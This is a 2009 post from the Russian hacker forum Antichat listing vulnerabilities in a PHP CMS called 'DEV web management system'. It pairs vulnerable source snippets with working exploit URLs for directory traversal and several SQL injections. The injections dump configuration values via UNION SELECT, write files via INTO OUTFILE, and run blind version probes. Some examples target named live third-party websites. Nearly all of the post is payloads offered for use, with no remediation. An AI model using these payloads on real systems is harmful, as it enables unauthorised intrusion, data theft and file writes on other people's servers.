ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

DEV web management system
  #1  
Старый 16.10.2009, 00:14
Аватар для AFoST
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию DEV web management system

Продукт DEV web management system

========================
Directory reading


PHP код:
gallery.php
...
if (
$ct) {
$dp=OpenDir ("$configuration->gallery_folder_url$ct/");

$i=0;

$configuration->thumbnail_spacing=floor($configuration->thumbnail_spacing/2);


while (
$fname=ReadDir($dp)) {
... 
http://dev/index.php?session=0&action=gallery&page=1&ct=wallp apers/../../
example: http://www.hornatorysa.com/index.php?session=0&action=gallery&page=1&ct=/../../../../../www/hornatorysa.com/public_html/
===========================
SQL-injection


PHP код:
determ_title.php
...
switch (
$action) {
 case 
"register";
 
$pagetitle="$configuration->site_name :: $language[AUTHOR_REGISTRATION]";
 break;
case 
"add";
 
$pagetitle="$configuration->site_name :: $language[ADD_ARTICLE_INTO_SYSTEM]";
 break;
case 
"read";
 @
$titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
 
$pagetitle="$configuration->site_name :: $titlpart[nazov]";
 break;
case 
"komentar";
 @
$titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
 
$pagetitle="$configuration->site_name :: $titlpart[nazov] - $language[COMMENTS]";
 break;
... 
http://dev/?action=read&article=1+union+select+concat(name,0x 3a,value%20)+from+variables1+limit+2,1+--%20-
example: http://2pure.net/?action=read&article=1+union+select+concat(name,0x 3a,value%20)+from+variables1+limit+2,1+--%20-
=========================
SQL-injection


PHP код:
komentar.php
...
$prikaz="SELECT * FROM komentar1 WHERE article LIKE '".$article."' ORDER BY id DESC LIMIT ".($page-1)*$configuration->comments_boards_entries.",".$configuration->comments_boards_entries;
$total=mysql_fetch_row(mysql_query("SELECT count(id) FROM komentar1 WHERE article LIKE '$article'",$spojenie));
$vysledok=mysql_query ($prikaz,$spojenie);
... 
http://dev/index.php?session=0&action=komentar&article=2+unio n+select+concat(name,0x3a,value%20)+from+variables 1+limit+2,1+/*
========================
SQL-injection


PHP код:
readtp.php
...
$prikaz="SELECT * FROM topic1 WHERE id=$id";
$vysledok=mysql_query ($prikaz,$spojenie);
$zaznam=mysql_fetch_array ($vysledok);
... 
http://dev/index.php?action=readtp&id=1+union+select+1,concat (name,0x3a,value%20),3,4,5+from+variables1+limit+2 ,1+--%20-
==========================
SQL-injection blind


PHP код:
komentar.php
...
 
$enteredexist=mysql_fetch_array(mysql_query ("SELECT id FROM autor1 WHERE nickname like '$autor'"$spojenie));
... 
http://dev/index.php?session=0&action=komentar&article=&autor =-1'+union+select+1+into+outfile+'c:/1.txt'+--%20-
==========================
SQL-injection blind


PHP код:
komentar.php
...
if (
$spravit=="pridat") {
 if (
$autor=="" || $nazov=="" || $komentar =="") {
 ...
 elseif (!
mysql_fetch_array(mysql_query("SELECT id FROM prispevok1 WHERE id=$article",$spojenie))) {
  echo (
"<b><center>FATAL ERROR: ARTICLE NOT FOUND</center></b><br/><br/>");
 }
... 
http://dev/index.php?session=0&action=komentar&spravit=pridat &article=1+union+select+1+into+outfile+'c:/2.txt'+/*
=========================
SQL-injection blind


PHP код:
read.php
...
$prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
$xvysledok=mysql_query ($prikaz,$spojenie);
$xzaznam=mysql_fetch_array ($xvysledok);
... 
http://dev/index.php?action=read&article=-1+or+5=(select+substring(version(),1,1))+--%20--
http://dev/index.php?action=read&article=-1+and+1=0+union+select+1,2,3,4,5+into+outfile+'c:/1.txt'--%20--
=========================
SQL-injection blind


PHP код:
send.php
...
$prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
$xvysledok=mysql_query ($prikaz,$spojenie);
... 
http://dev/index.php?action=send&article=-1+or+5=(select+substring(version(),1,1))+--%20--
=========================
SQL-injection blind

PHP код:
fpasswd.php
...
if (
$odoslane=="true" && $login!="") {
$login=trim ($login);
$prikaz="SELECT nickname, mail, heslo FROM autor1 WHERE nickname LIKE '".$login."'";
$vysledok=mysql_query($prikaz,$spojenie);
$zaznam=mysql_fetch_array($vysledok);
... 
http://dev/index.php?action=forgot&odoslane=true&login='+or+5 =(select+substring(version(),1,1))--%20-
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Пропадает интернет, жёстко лагает комп Ctacok Windows 10 03.05.2009 00:52
Онлайн база номеров De1eT ICQ 154 07.01.2008 20:37
История одного взлома. Добыча маленьких хакерских радостей. 1ten0.0net1 Авторские статьи 10 23.10.2006 03:22
Защита Web приложений с помощью Apache и mod_security k00p3r Чужие Статьи 0 12.06.2005 20:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ